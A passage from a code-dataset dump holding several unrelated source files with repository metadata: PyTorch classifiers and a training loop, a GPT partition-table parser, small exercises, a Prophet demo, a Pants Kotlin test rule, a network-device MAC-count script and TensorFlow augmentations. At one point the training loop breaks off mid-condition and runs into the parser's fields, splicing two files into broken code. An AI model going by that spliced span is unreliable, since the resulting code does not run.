nn.LeakyReLU(),\n nn.Linear(1024, 512),\n nn.LeakyReLU(),\n nn.Linear(512,128),\n nn.LeakyReLU(),\n nn.Linear(128, 16),\n nn.LeakyReLU(),\n nn.Linear(16,2)\n )\n\n def forward(self, x):\n x=x.reshape([-1,72*6])\n x = self.Linearnet(x)\n return x\n\nclass ZeroOrNot(nn.Module):\n '''데이터 네트워크 만들기'''\n def __init__(self,phase):\n super(ZeroOrNot,self).__init__()\n self.phase = phase\n self.Linearnet = nn.Sequential(\n nn.Linear(72*6,1024),\n nn.BatchNorm1d(1024),\n nn.LeakyReLU(),\n nn.Linear(1024,256),\n nn.BatchNorm1d(256),\n nn.LeakyReLU(),\n nn.Linear(256,512),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(),\n nn.Linear(512, 128),\n nn.BatchNorm1d(128),\n nn.LeakyReLU(),\n nn.Linear(128, 32),\n nn.BatchNorm1d(32),\n nn.LeakyReLU(),\n nn.Linear(32, 16),\n nn.LeakyReLU(),\n nn.Linear(16,2),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n x=x.reshape([-1,72*6])\n x = self.Linearnet(x)\n return x\nclass ZeroOrNotX(nn.Module):\n '''데이터 네트워크 만들기'''\n def __init__(self,X,phase):\n super(ZeroOrNotX,self).__init__()\n self.phase = phase\n self.X = X\n self.Linearnet = nn.Sequential(\n nn.Linear(self.X,1024),\n nn.BatchNorm1d(1024),\n nn.LeakyReLU(),\n nn.Linear(1024,256),\n nn.BatchNorm1d(256),\n nn.LeakyReLU(),\n nn.Linear(256,512),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(),\n nn.Linear(512, 128),\n nn.BatchNorm1d(128),\n nn.LeakyReLU(),\n nn.Linear(128, 32),\n nn.BatchNorm1d(32),\n nn.LeakyReLU(),\n nn.Linear(32, 16),\n nn.LeakyReLU(),\n nn.Linear(16,2),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n x=x.reshape([-1,self.X])\n x = self.Linearnet(x)\n return x\n\n\nclass SimpleZeroOrNot(nn.Module):\n '''데이터 네트워크 만들기'''\n def __init__(self,phase):\n super(SimpleZeroOrNot,self).__init__()\n self.phase = phase\n self.Linearnet = nn.Sequential(\n nn.Linear(72*6,512),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(),\n nn.Linear(512,128),\n nn.BatchNorm1d(128),\n nn.LeakyReLU(),\n nn.Linear(128, 32),\n nn.BatchNorm1d(32),\n nn.LeakyReLU(),\n nn.Linear(32,2),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n x=x.reshape([-1,72*6])\n x = self.Linearnet(x)\n return x\n\n\ndef train_model(model,dataloaders_dict, criterion, optimizer, num_epochs):\n device=torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n print(\"사용 장치: \", device)\n\n model.to(device)\n before_best = 100000\n torch.backends.cudnn.benchmark=True\n log_data = defaultdict(list)\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch+1,num_epochs))\n print('-'*30)\n epoch_loss_dict={}\n for phase in dataloaders_dict:\n if phase=='val':\n model.eval()\n else:\n model.train()\n\n epoch_loss=0.0\n epoch_corrects=0\n\n if(epoch==0) and (phase.startswith('train')):\n continue\n for inputs, labels in tqdm(dataloaders_dict[phase]):\n inputs=inputs.to(device)\n labels=labels.to(device)\n\n optimizer.zero_grad()\n\n with torch.set_grad_enabled(phase.startswith('train')):\n outputs = model(inputs)\n\n loss=criterion(outputs,labels.to(torch.float32))\n\n if phase.startswith('train'):\n loss.backward()\n optimizer.step()\n epoch_loss +=loss.item()*inputs.size(0)\n\n epoch_loss = epoch_loss/len(dataloaders_dict[phase])\n epoch_loss_dict[phase]=epoch_loss\n for key in epoch_loss_dict:\n print('{} Loss: {:.4f}'.format(key,epoch_loss_dict[key]), end=' ')\n if epoch!=0:\n log_data[key].append(epoch_loss_dict[key])\n if epoch_loss_dict['val']I'),\n ('header_size', 'I'),\n ('crc32', 'I'),\n ('reserved', 'I'),\n ('current_lba', 'Q'),\n ('backup_lba', 'Q'),\n ('first_usable_lba', 'Q'),\n ('last_usable_lba', 'Q'),\n ('disk_guid', '16s'),\n ('part_entry_start_lba', 'Q')\n ]\n\n gpt_partition = [\n ('type', '16s'),\n ('unique', '16s'),\n ('first_lba', 'Q'),\n ('last_lba', 'Q'),\n ('flags', '>Q'),\n ('name', '72s')]\n\n class efi_type(Enum):\n EFI_UNUSED = 0x00000000\n EFI_MBR = 0x024DEE41\n EFI_SYSTEM = 0xC12A7328\n EFI_BIOS_BOOT = 0x21686148\n EFI_IFFS = 0xD3BFE2DE\n EFI_SONY_BOOT = 0xF4019732\n EFI_LENOVO_BOOT = 0xBFBFAFE7\n EFI_MSR = 0xE3C9E316\n EFI_BASIC_DATA = 0xEBD0A0A2\n EFI_LDM_META = 0x5808C8AA\n EFI_LDM = 0xAF9B60A0\n EFI_RECOVERY = 0xDE94BBA4\n EFI_GPFS = 0x37AFFC90\n EFI_STORAGE_SPACES = 0xE75CAF8F\n EFI_HPUX_DATA = 0x75894C1E\n EFI_HPUX_SERVICE = 0xE2A1E728\n EFI_LINUX_DAYA = 0x0FC63DAF\n EFI_LINUX_RAID = 0xA19D880F\n EFI_LINUX_ROOT32 = 0x44479540\n EFI_LINUX_ROOT64 = 0x4F68BCE3\n EFI_LINUX_ROOT_ARM32 = 0x69DAD710\n EFI_LINUX_ROOT_ARM64 = 0xB921B045\n EFI_LINUX_SWAP = 0x0657FD6D\n EFI_LINUX_LVM = 0xE6D6D379\n EFI_LINUX_HOME = 0x933AC7E1\n EFI_LINUX_SRV = 0x3B8F8425\n EFI_LINUX_DM_CRYPT = 0x7FFEC5C9\n EFI_LINUX_LUKS = 0xCA7D7CCB\n EFI_LINUX_RESERVED = 0x8DA63339\n EFI_FREEBSD_BOOT = 0x83BD6B9D\n EFI_FREEBSD_DATA = 0x516E7CB4\n EFI_FREEBSD_SWAP = 0x516E7CB5\n EFI_FREEBSD_UFS = 0x516E7CB6\n EFI_FREEBSD_VINUM = 0x516E7CB8\n EFI_FREEBSD_ZFS = 0x516E7CBA\n EFI_OSX_HFS = 0x48465300\n EFI_OSX_UFS = 0x55465300\n EFI_OSX_ZFS = 0x6A898CC3\n EFI_OSX_RAID = 0x52414944\n EFI_OSX_RAID_OFFLINE = 0x52414944\n EFI_OSX_RECOVERY = 0x426F6F74\n EFI_OSX_LABEL = 0x4C616265\n EFI_OSX_TV_RECOVERY = 0x5265636F\n EFI_OSX_CORE_STORAGE = 0x53746F72\n EFI_SOLARIS_BOOT = 0x6A82CB45\n EFI_SOLARIS_ROOT = 0x6A85CF4D\n EFI_SOLARIS_SWAP = 0x6A87C46F\n EFI_SOLARIS_BACKUP = 0x6A8B642B\n EFI_SOLARIS_USR = 0x6A898CC3\n EFI_SOLARIS_VAR = 0x6A8EF2E9\n EFI_SOLARIS_HOME = 0x6A90BA39\n EFI_SOLARIS_ALTERNATE = 0x6A9283A5\n EFI_SOLARIS_RESERVED1 = 0x6A945A3B\n EFI_SOLARIS_RESERVED2 = 0x6A9630D1\n EFI_SOLARIS_RESERVED3 = 0x6A980767\n EFI_SOLARIS_RESERVED4 = 0x6A96237F\n EFI_SOLARIS_RESERVED5 = 0x6A8D2AC7\n EFI_NETBSD_SWAP = 0x49F48D32\n EFI_NETBSD_FFS = 0x49F48D5A\n EFI_NETBSD_LFS = 0x49F48D82\n EFI_NETBSD_RAID = 0x49F48DAA\n EFI_NETBSD_CONCAT = 0x2DB519C4\n EFI_NETBSD_ENCRYPT = 0x2DB519EC\n EFI_CHROMEOS_KERNEL = 0xFE3A2A5D\n EFI_CHROMEOS_ROOTFS = 0x3CB8E202\n EFI_CHROMEOS_FUTURE = 0x2E0A753D\n EFI_HAIKU = 0x42465331\n EFI_MIDNIGHTBSD_BOOT = 0x85D5E45E\n EFI_MIDNIGHTBSD_DATA = 0x85D5E45A\n EFI_MIDNIGHTBSD_SWAP = 0x85D5E45B\n EFI_MIDNIGHTBSD_UFS = 0x0394EF8B\n EFI_MIDNIGHTBSD_VINUM = 0x85D5E45C\n EFI_MIDNIGHTBSD_ZFS = 0x85D5E45D\n EFI_CEPH_JOURNAL = 0x45B0969E\n EFI_CEPH_ENCRYPT = 0x45B0969E\n EFI_CEPH_OSD = 0x4FBD7E29\n EFI_CEPH_ENCRYPT_OSD = 0x4FBD7E29\n EFI_CEPH_CREATE = 0x89C57F98\n EFI_CEPH_ENCRYPT_CREATE = 0x89C57F98\n EFI_OPENBSD = 0x824CC7A0\n EFI_QNX = 0xCEF5A9AD\n EFI_PLAN9 = 0xC91818F9\n EFI_VMWARE_VMKCORE = 0x9D275380\n EFI_VMWARE_VMFS = 0xAA31E02A\n EFI_VMWARE_RESERVED = 0x9198EFFC\n\n def __init__(self, num_part_entries=None, part_entry_size=None, part_entry_start_lba=None, *args, **kwargs):\n self.num_part_entries = num_part_entries\n self.part_entry_size = part_entry_size\n self.part_entry_start_lba = part_entry_start_lba\n if num_part_entries is None:\n self.gpt_header += [('num_part_entries', 'I'),]\n if part_entry_size is None:\n self.gpt_header += [('part_entry_size', 'I'),]\n\n\n def parse(self, gptdata, sectorsize=512):\n self.header = read_object(gptdata[sectorsize:sectorsize+0x5C], self.gpt_header)\n self.sectorsize=sectorsize\n if self.header[\"signature\"]!=b\"EFI PART\":\n print(\"Invalid or unknown GPT magic.\")\n return False\n if self.header[\"revision\"]!=0x100:\n print(\"Unknown GPT revision.\")\n return False\n if self.part_entry_start_lba is not None:\n start = self.part_entry_start_lba\n else:\n start=self.header[\"part_entry_start_lba\"]*sectorsize\n if \"part_entry_size\" in self.header:\n entrysize=self.header[\"part_entry_size\"]\n else:\n entrysize=self.part_entry_size\n self.partentries=[]\n\n class partf:\n unique=b\"\"\n first_lba=0\n last_lba=0\n flags=0\n type=b\"\"\n name=b\"\"\n\n if \"num_part_entries\" in self.header:\n num_part_entries=self.header[\"num_part_entries\"]\n else:\n num_part_entries=self.num_part_entries\n \n for idx in range(0,num_part_entries):\n data=gptdata[start+(idx*entrysize):start+(idx*entrysize)+entrysize]\n partentry=read_object(data,self.gpt_partition)\n pa=partf()\n guid1=struct.unpack(\" int:\n # Check if the grid is empty or the top-left cell is an obstacle\n if not obstacleGrid or not obstacleGrid[0] or obstacleGrid[0][0] == 1:\n return 0\n\n # Get the dimensions of the grid\n m, n = len(obstacleGrid), len(obstacleGrid[0])\n\n # Initialize two arrays to store the number of unique paths for each cell in the current and previous rows\n previous = [0] * n\n current = [0] * n\n previous[0] = 1 # There is one way to reach the top-left cell\n\n # Iterate through each row\n for i in range(m):\n # Calculate the number of unique paths for the first cell in the current row\n current[0] = 0 if obstacleGrid[i][0] == 1 else previous[0]\n\n # Iterate through each column starting from the second cell\n for j in range(1, n):\n # Calculate the number of unique paths for the current cell based on the obstacles\n current[j] = (\n 0 if obstacleGrid[i][j] == 1 else current[j - 1] + previous[j]\n )\n\n # Update the 'previous' array with the values of the 'current' array for the next iteration\n previous[:] = current\n\n # The result is the number of unique paths for the bottom-right cell\n return previous[n - 1]\n","repo_name":"Amit258012/100daysofcode","sub_path":"Day80/unique_paths_2.py","file_name":"unique_paths_2.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27589225247","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 19 11:49:17 2019\r\n\r\n@author: dbt\r\n\"\"\"\r\n# Python\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom fbprophet import Prophet\r\nimport sys\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nfrom fbprophet.plot import add_changepoints_to_plot\r\n\r\n#orig_out = sys.stdout\r\n#sys.stdout = open(os.devnull, 'w')\r\n \r\n\r\n#filename = sys.argv[1] #从cmd读取数据\r\nfilename='data'#从指定文件读取数据\r\n\r\n\r\ndf = pd.read_csv(filename+'.txt')\r\n#df['y'] = np.log(df['y']) #为什么要log处理?都要有吗?\r\n\r\n#df['cap'] = 1#log预测才用\r\n#df['floor'] = -1#log预测才用\r\n\r\ndf.head()\r\n\r\n\r\n#设置跟随性: changepoint_prior_scale=0.05 值越大,拟合的跟随性越好,可能会过拟合\r\n#设置置信区间:interval_width=0.8(默认值),值越小,上下线的带宽越小。\r\n#指定预测类型: growth='linear'或growth = \"logistic\" ,默认应该是linear。\r\n#马尔科夫蒙特卡洛取样(MCMC): mcmc_samples=0,会计算很慢。距离意义不清楚\r\n#设置寻找突变点的比例:changepoint_range=0.9 默认从数据的前90%中寻找异常数据。预测这个正弦曲线,如果不设置changepoint_range=1,预测的结果是不对的,不知道为什么。\r\n\r\nm = Prophet(changepoint_prior_scale=0.9,interval_width=0.9,growth='linear',changepoint_range=1) \r\nm.fit(df);\r\n\r\n#periods 周期,一般是根据实际意义确定,重点:后续预测的长度是一个周期的长度。\r\n#freq 我见的有‘MS‘、H、M ,预测sin,要设置H ,个人理解数据如果变化很快,要用H\r\nfuture = m.make_future_dataframe(periods=120, freq='H') #freq=‘MS‘或者H 来设置\r\n\r\nfuture['cap'] = 1 #log预测才用?linear也可以加上。\r\nfuture['floor'] = -1#log预测才用?linear也可以加上。\r\n\r\n#画图\r\nfuture.tail()\r\n\r\nforecast = m.predict(future)\r\nforecast.tail()\r\nfig=m.plot(forecast)\r\nplt.savefig('./out/'+filename+'_1.jpg',dpi=500)\r\nm.plot_components(forecast)\r\nplt.savefig('./out/'+filename+'_2.jpg',dpi=500)\r\n#print(forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']]) #打印到console\r\n \r\n\r\nsavename='./out/'+filename+\"_out.txt\"\r\n \r\n \r\n#forecast.to_csv(savename, sep='\\t',index=False) #保留panda.dataframe 的全部列数据\r\n\r\nforecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].to_csv(savename, sep='\\t',index=False) #保留panda.dataframe 的指定列的数据\r\n\r\nx = forecast['ds']\r\ny = forecast['yhat']\r\ny1 = forecast['yhat_lower']\r\ny2 = forecast['yhat_upper']\r\nplt.plot(x,y)\r\nplt.savefig('./out/'+filename+'_3.jpg',dpi=500)\r\nplt.plot(x,y1)\r\nplt.savefig('./out/'+filename+'_4.jpg',dpi=500)\r\nplt.plot(x,y2)\r\nplt.savefig('./out/'+filename+'_5.jpg',dpi=500)\r\n#plt.show()\r\n\r\n#把检测到的突变点,用红色线表示在图上。\r\na = add_changepoints_to_plot(fig.gca(), m, forecast)\r\n\r\n","repo_name":"DamonDBT/prophet_sin_demo","sub_path":"demo/prophet.py","file_name":"prophet.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"8968601400","text":"print('''\nO que você deseja?\n[ 1 ] Adicionar uma quantidade especifica de valores na lista\n[ 2 ] Adicionar um valor indertemidado de valores na lista\n[ 3 ] Fechar o programa\n''')\n\nescolha = int(input('Sua escolha : '))\nlista = []\nlistaOrganizada = []\ncontador = 0\nmenor = -1\n\n # SISTEMA QUE RECEBE OS VALORES E ADICIONA A LISTA\nwhile True:\n if escolha == 1:\n quantidade = int(input('Quantos valores deseja adicionar : '))\n\n for i in range(quantidade):\n valor = int(input('Digite o {}° valor desejado : '.format(i + 1)))\n lista.append(valor)\n break\n\n elif escolha == 2:\n print('ATENÇÃO : O programa irá fechar quando você digitar o numero 0')\n\n while True:\n contador += 1\n valor = int(input('Digite o {}° valor desejado : '.format(contador)))\n lista.append(valor)\n\n if valor == 0:\n break\n break\n\n elif escolha == 3:\n print('ENCERRANDO . . .')\n break\n\n else:\n print('Escolha inválida, por favor, digite novamente!')\n escolha = int(input('Sua escolha : '))\n\nprint('Sua lista digitada ficou assim :')\nfor c in range(len(lista)):\n print('{} '.format(lista[c]), end = '')\n\nc = 0\nlista.sort()\n\nprint('\\nA lista foi organizada e ficou assim : ')\n\nfor c in range(len(lista)):\n print('{} -> '.format(lista[c]), end = '')\n\nprint('FIM')\n\n\n # PRIMEIRA TENTATIVA \n# for c in range(len(lista)):\n# numero = lista[c]\n# \n# if numero == menor:\n# nuemro = lista[c]\n# \n# else:\n# for a in range(len(lista)):\n# if numero >= lista[a]:\n# menor = lista[a]\n# else:\n# maior = lista[a]\n# \n# if c == len(lista):\n# listaOrganizada.append(maior)\n# \n# listaOrganizada.append(numero)\n# print(menor)\n\n\n # SEGUNDA TENTATIVA\n# for c in range(len(lista)):\n# menor = lista[c]\n# \n# for a in range(c + 1, len(lista)):\n# if menor >= lista[a]:\n# menor = lista[a]\n# \n# c, menor = menor, c","repo_name":"FabricioJonatan/Estudo-de-Python","sub_path":"Programas feitos no IF/DesafioListas.py","file_name":"DesafioListas.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70929851388","text":"import torch\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nfrom torch import nn\nimport torch.optim as optim\nimport time\n\n# 数据集路径\ndataset_dir = \"dataset/Caltech256\"\n\n# 预处理\ntrain_transforms = transforms.Compose([\n transforms.Resize((224, 224)), # 调整图片大小至224x224像素\n transforms.RandomHorizontalFlip(), # 随机水平翻转图片,增加数据集的多样性。\n transforms.ToTensor(), # 将图片转换为 PyTorch 中的张量(tensor)类型,以便能够输入到神经网络中进行训练。\n # 对图片进行标准化处理,使得每个像素的数值都集中在 0 周围,并具有相同的方差。这个过程可以提高模型的训练效果和准确性。\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))\n])\n# test_transforms = transforms.Compose([\n# transforms.Resize((224, 224)),\n# transforms.ToTensor(),\n# transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))\n# ])\n\n# 加载数据集\ntrain_data = datasets.ImageFolder(root=dataset_dir + '/256_ObjectCategories', transform=train_transforms)\n# test_data = datasets.ImageFolder(root=dataset_dir + '/test', transform=test_transforms)\n\ntrain_loader = torch.utils.data.DataLoader(train_data, batch_size=64, shuffle=True)\n# test_loader = torch.utils.data.DataLoader(test_data, batch_size=32)\n\ntrain_num = len(train_data)\n# test_num = len(test_data)\nprint(\"训练数据集数量:{}\".format(train_num))\n# print(\"验证数据集数量:{}\".format(test_num))\n\n# 加载训练设备\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nif device.type == 'cuda':\n print('使用GPU训练')\nelse:\n print('使用CPU训练')\n\n# 加载模型\nmodel = torch.load(\"vgg16_caltech256.pth\")\nmodel.to(device)\n\n# 定义损失函数和优化器\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=0.001)\ncriterion.to(device)\n\n# 设置训练网络的参数\nepoch = 10 # 训练轮数\n\nstart_time = time.time() # 开始时间\ntemp_time = start_time\n\n# 开始训练\nfor i in range(epoch):\n print(\"--------------第{}轮训练开始:---------------\".format(i + 21))\n # 将模型设置为训练模式\n model.train()\n # 初始化训练损失和正确率\n train_loss = 0.0\n train_acc = 0.0\n for data in train_loader:\n images, targets = data\n images = images.to(device)\n targets = targets.to(device)\n # 梯度清零\n optimizer.zero_grad()\n # 前向传播,计算损失\n outputs = model(images) # 将数据放到网络中训练\n loss = criterion(outputs, targets) # 用损失函数得到差异值\n # 优化模型,反向传播,更新模型参数\n loss.backward()\n optimizer.step()\n # 统计训练损失和正确率\n train_loss += loss.item() * images.size(0)\n preds = torch.max(outputs, 1)\n train_acc += (preds[1] == targets).sum().item()\n\n # 计算平均训练损失和正确率\n train_loss = train_loss / train_num\n train_acc = train_acc / train_num\n # 计算平均验证损失和正确率\n print(\"第{}轮训练平均损失值为{}\".format(i + 21, train_loss))\n print(\"第{}轮训练正确率为{}\".format(i + 21, train_acc))\n\n end_time = time.time()\n print(\"第{}轮训练用时{}秒\".format(i + 21, end_time - temp_time))\n temp_time = end_time\n\n # 保存模型\n torch.save(model, \"vgg16_caltech256.pth\")\n print(\"本轮模型已保存\")\n print(\"--------------第{}轮训练结束:---------------\".format(i + 21))\n\nend_time = time.time() # 结束时间\nprint(\"共用时{}秒\".format(end_time-start_time))\n\n","repo_name":"g1823/GraduationDesign-Classification","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26040627146","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\n\nfrom pants.backend.kotlin.subsystems.kotlin import KotlinSubsystem\nfrom pants.backend.kotlin.target_types import KotlinJunitTestDependenciesField\nfrom pants.build_graph.address import Address\nfrom pants.engine.internals.selectors import Get\nfrom pants.engine.rules import collect_rules, rule\nfrom pants.engine.target import FieldSet, InferDependenciesRequest, InferredDependencies\nfrom pants.engine.unions import UnionRule\nfrom pants.jvm.dependency_inference.artifact_mapper import (\n AllJvmArtifactTargets,\n find_jvm_artifacts_or_raise,\n)\nfrom pants.jvm.resolve.common import Coordinate\nfrom pants.jvm.subsystems import JvmSubsystem\nfrom pants.jvm.target_types import JvmResolveField\n\n\n@dataclass(frozen=True)\nclass KotlinJunitTestDependencyInferenceFieldSet(FieldSet):\n required_fields = (KotlinJunitTestDependenciesField, JvmResolveField)\n\n dependencies: KotlinJunitTestDependenciesField\n resolve: JvmResolveField\n\n\nclass InferKotlinJunitTestDependencyRequest(InferDependenciesRequest):\n infer_from = KotlinJunitTestDependencyInferenceFieldSet\n\n\n@dataclass(frozen=True)\nclass KotlinJunitLibrariesForResolveRequest:\n resolve_name: str\n\n\n@dataclass(frozen=True)\nclass KotlinJunitLibrariesForResolve:\n addresses: frozenset[Address]\n\n\n@rule\nasync def resolve_kotlin_junit_libraries_for_resolve(\n request: KotlinJunitLibrariesForResolveRequest,\n jvm_artifact_targets: AllJvmArtifactTargets,\n jvm: JvmSubsystem,\n kotlin_subsystem: KotlinSubsystem,\n) -> KotlinJunitLibrariesForResolve:\n kotlin_version = kotlin_subsystem.version_for_resolve(request.resolve_name)\n addresses = find_jvm_artifacts_or_raise(\n required_coordinates=[\n Coordinate(\n group=\"org.jetbrains.kotlin\",\n artifact=\"kotlin-test-junit\",\n version=kotlin_version,\n ),\n ],\n resolve=request.resolve_name,\n jvm_artifact_targets=jvm_artifact_targets,\n jvm=jvm,\n subsystem=\"the Kotlin test runtime for JUnit\",\n target_type=\"kotlin_junit_tests\",\n requirement_source=\"the relevant entry for this resolve in the `[kotlin].version_for_resolve` option\",\n )\n return KotlinJunitLibrariesForResolve(addresses)\n\n\n@rule(desc=\"Infer dependency on Kotlin Junit support artifact.\")\nasync def infer_kotlin_junit_dependency(\n request: InferKotlinJunitTestDependencyRequest,\n jvm: JvmSubsystem,\n) -> InferredDependencies:\n resolve = request.field_set.resolve.normalized_value(jvm)\n\n kotlin_junit_libraries = await Get(\n KotlinJunitLibrariesForResolve, KotlinJunitLibrariesForResolveRequest(resolve)\n )\n return InferredDependencies(kotlin_junit_libraries.addresses)\n\n\ndef rules():\n return (\n *collect_rules(),\n UnionRule(InferDependenciesRequest, InferKotlinJunitTestDependencyRequest),\n )\n","repo_name":"pantsbuild/pants","sub_path":"src/python/pants/backend/kotlin/test/junit.py","file_name":"junit.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":2896,"dataset":"github-code","pt":"6"} +{"seq_id":"40411379291","text":"#!/usr/bin/env python3\n\"\"\"\nName: mac_address_count.py\nDescription: NXAPI: display mac address-table count\n\nExample output:\n\n% ./mac_address_count.py --vault hashicorp --devices cvd_leaf_1,cvd_l2_fanout\nip device vlan total dyn otv rvtep static secure\n192.168.11.102 cvd-1311-leaf all 9 3 6 0 0 0\n192.168.11.116 cvd_l2_911 all 25 25 0 0 0 0\n% \n\"\"\"\nour_version = 107\nscript_name = \"mac_address_count\"\n\n# standard libraries\nimport argparse\nfrom concurrent.futures import ThreadPoolExecutor\n\n# local libraries\nfrom nxapi_netbox.args.args_cookie import ArgsCookie\nfrom nxapi_netbox.args.args_nxapi_tools import ArgsNxapiTools\nfrom nxapi_netbox.general.log import get_logger\nfrom nxapi_netbox.netbox.netbox_session import netbox, get_device_mgmt_ip\nfrom nxapi_netbox.vault.vault import get_vault\nfrom nxapi_netbox.nxapi.nxapi_mac_address_table import NxapiMacCount\nfrom nxapi_netbox.nxapi.nxapi_vlan import NxapiVlanId\n\n\ndef get_parser():\n help_vlan = \"the vlan in which to query mac address-table count. If not specified, printed values represent totals for all vlans\"\n ex_vlan = \"--vlan 42\"\n\n parser = argparse.ArgumentParser(\n description=\"DESCRIPTION: NXAPI: display mac address-table count\",\n parents=[ArgsCookie, ArgsNxapiTools],\n )\n default = parser.add_argument_group(title=\"DEFAULT SCRIPT ARGS\")\n mandatory = parser.add_argument_group(title=\"MANDATORY SCRIPT ARGS\")\n\n default.add_argument(\n \"--vlan\",\n dest=\"vlan\",\n required=False,\n default=0,\n help=\"default {} {} {}\".format(\"%(default)s\", help_vlan, ex_vlan),\n )\n\n parser.add_argument(\n \"--version\", action=\"version\", version=\"{} v{}\".format(\"%(prog)s\", our_version)\n )\n return parser.parse_args()\n\n\ndef get_device_list():\n try:\n return cfg.devices.split(\",\")\n except:\n log.error(\n \"exiting. Cannot parse --devices {}. Example usage: --devices leaf_1,spine_2,leaf_2\".format(\n cfg.devices\n )\n )\n exit(1)\n\n\ndef print_output(futures):\n for future in futures:\n output = future.result()\n if output == None:\n continue\n for line in output:\n print(line)\n\n\ndef verify_vlan(ip, vault):\n if cfg.vlan == 0:\n return True\n nx = NxapiVlanId(vault.nxos_username, vault.nxos_password, ip, log)\n nx.nxapi_init(cfg)\n nx.vlan = cfg.vlan\n nx.refresh()\n if not nx.vlan_id:\n log.error(\n \"Exiting. vlan {} does not exist on {}.\".format(cfg.vlan, nx.hostname)\n )\n return False\n return True\n\n\ndef print_header():\n print(\n fmt.format(\n \"ip\", \"device\", \"vlan\", \"total\", \"dyn\", \"otv\", \"rvtep\", \"static\", \"secure\"\n )\n )\n\n\ndef worker(device, vault):\n ip = get_device_mgmt_ip(nb, device)\n lines = list()\n if not verify_vlan(ip, vault):\n return lines\n nx = NxapiMacCount(vault.nxos_username, vault.nxos_password, ip, log)\n nx.nxapi_init(cfg)\n nx.vlan = cfg.vlan\n nx.refresh()\n if nx.vlan == 0:\n vlan = \"all\"\n else:\n vlan = nx.vlan\n lines.append(\n fmt.format(\n ip,\n nx.hostname,\n vlan,\n nx.total_cnt,\n nx.dyn_cnt,\n nx.otv_cnt,\n nx.rvtep_static_cnt,\n nx.static_cnt,\n nx.secure_cnt,\n )\n )\n return lines\n\n\ncfg = get_parser()\nlog = get_logger(script_name, cfg.loglevel, \"DEBUG\")\nvault = get_vault(cfg.vault)\nvault.fetch_data()\nnb = netbox(vault)\n\ndevices = get_device_list()\n\nfmt = \"{:<15} {:<18} {:>4} {:>7} {:>7} {:>7} {:>5} {:>7} {:>7}\"\nprint_header()\n\nexecutor = ThreadPoolExecutor(max_workers=len(devices))\nfutures = list()\nfor device in devices:\n args = [device, vault]\n futures.append(executor.submit(worker, *args))\nprint_output(futures)\n","repo_name":"allenrobel/nxapi-netbox","sub_path":"scripts/mac_address_count.py","file_name":"mac_address_count.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20928836405","text":"import tensorflow as tf\n\n\"\"\"\nThere are various data augmentations for training object detectors.\n\n`image` is assumed to be a float tensor with shape [height, width, 3],\nit is a RGB image with pixel values in range [0, 1].\n\"\"\"\n\n\ndef random_color_manipulations(image, probability=0.5, grayscale_probability=0.1):\n\n def manipulate(image):\n # intensity and order of this operations are kinda random,\n # so you will need to tune this for you problem\n image = tf.image.random_brightness(image, 0.1)\n image = tf.image.random_contrast(image, 0.8, 1.2)\n image = tf.image.random_hue(image, 0.1)\n image = tf.image.random_saturation(image, 0.8, 1.2)\n image = tf.clip_by_value(image, 0.0, 1.0)\n return image\n\n def to_grayscale(image):\n image = tf.image.rgb_to_grayscale(image)\n image = tf.image.grayscale_to_rgb(image)\n return image\n\n with tf.name_scope('random_color_manipulations'):\n do_it = tf.less(tf.random_uniform([]), probability)\n image = tf.cond(do_it, lambda: manipulate(image), lambda: image)\n\n with tf.name_scope('to_grayscale'):\n make_gray = tf.less(tf.random_uniform([]), grayscale_probability)\n image = tf.cond(make_gray, lambda: to_grayscale(image), lambda: image)\n\n return image\n\n\ndef random_flip_left_right(image, boxes):\n\n def flip(image, boxes):\n flipped_image = tf.image.flip_left_right(image)\n ymin, xmin, ymax, xmax = tf.unstack(boxes, axis=1)\n flipped_xmin = tf.subtract(1.0, xmax)\n flipped_xmax = tf.subtract(1.0, xmin)\n flipped_boxes = tf.stack([ymin, flipped_xmin, ymax, flipped_xmax], 1)\n return flipped_image, flipped_boxes\n\n with tf.name_scope('random_flip_left_right'):\n do_it = tf.less(tf.random_uniform([]), 0.5)\n image, boxes = tf.cond(do_it, lambda: flip(image, boxes), lambda: (image, boxes))\n return image, boxes\n\n\ndef random_pixel_value_scale(image, minval=0.9, maxval=1.1, probability=0.5):\n \"\"\"This function scales each pixel independently of the other ones.\n\n Arguments:\n image: a float tensor with shape [height, width, 3],\n an image with pixel values varying between [0, 1].\n minval: a float number, lower ratio of scaling pixel values.\n maxval: a float number, upper ratio of scaling pixel values.\n probability: a float number.\n Returns:\n a float tensor with shape [height, width, 3].\n \"\"\"\n def random_value_scale(image):\n color_coefficient = tf.random_uniform(\n tf.shape(image), minval=minval,\n maxval=maxval, dtype=tf.float32\n )\n image = tf.multiply(image, color_coefficient)\n image = tf.clip_by_value(image, 0.0, 1.0)\n 